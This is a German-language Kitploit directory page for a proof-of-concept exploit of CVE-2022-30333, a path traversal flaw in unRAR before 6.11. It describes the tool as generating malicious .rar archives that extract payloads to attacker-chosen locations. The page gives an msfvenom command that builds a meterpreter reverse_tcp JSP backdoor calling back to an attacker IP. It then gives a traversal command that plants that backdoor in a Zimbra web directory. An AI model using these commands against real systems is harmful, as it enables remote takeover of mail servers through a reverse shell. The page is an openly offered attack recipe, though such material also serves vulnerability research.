Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-30333 — Proof-of-Concept-Exploit für CVE-2022-30333 Path Traversal in unRAR, der bösartige .rar-Dateien erzeugt, um beliebige Payloads an vom Angreifer festgelegte Speicherorte zu extrahieren. | Kitploit
Tools/GitHubGitHub/rakhithjk/cve-2022-30333
Exploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubrakhithjk/cve-2022-30333

CVE-2022-30333

Proof-of-Concept-Exploit für CVE-2022-30333 Path Traversal in unRAR, der bösartige .rar-Dateien erzeugt, um beliebige Payloads an vom Angreifer festgelegte Speicherorte zu extrahieren.

Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ein Proof-of-Concept für CVE-2022-30333 – eine Path-Traversal-Schwachstelle in unRAR-Versionen vor 6.11. Ich habe dies als Demonstration des Exploits für einen AttackerKB-Artikel erstellt und hoffe, es bald in ein Metasploit-Modul zu integrieren!

Im Grunde genommen geben Sie ein Ziel (einschließlich Pfadtraversal) und einige Dateidaten an, und dieses Tool generiert eine .rar-Datei, die diese Datei an diesen Ort extrahiert. Die maximale Dateilänge beträgt 104 Bytes und die maximale Dateilänge beträgt 4096 Bytes. (Das ist nicht intrinsisch für die Schwachstelle, es ist nur das, was ich gewählt habe, als ich die Datei generiert habe).

Erzeugen Sie zum Beispiel eine Backdoor mit msfvenom:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Erstellen Sie dann eine .rar-Datei und platzieren Sie die .jsp an einen unterhaltsamen Ort:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Tool herunterladen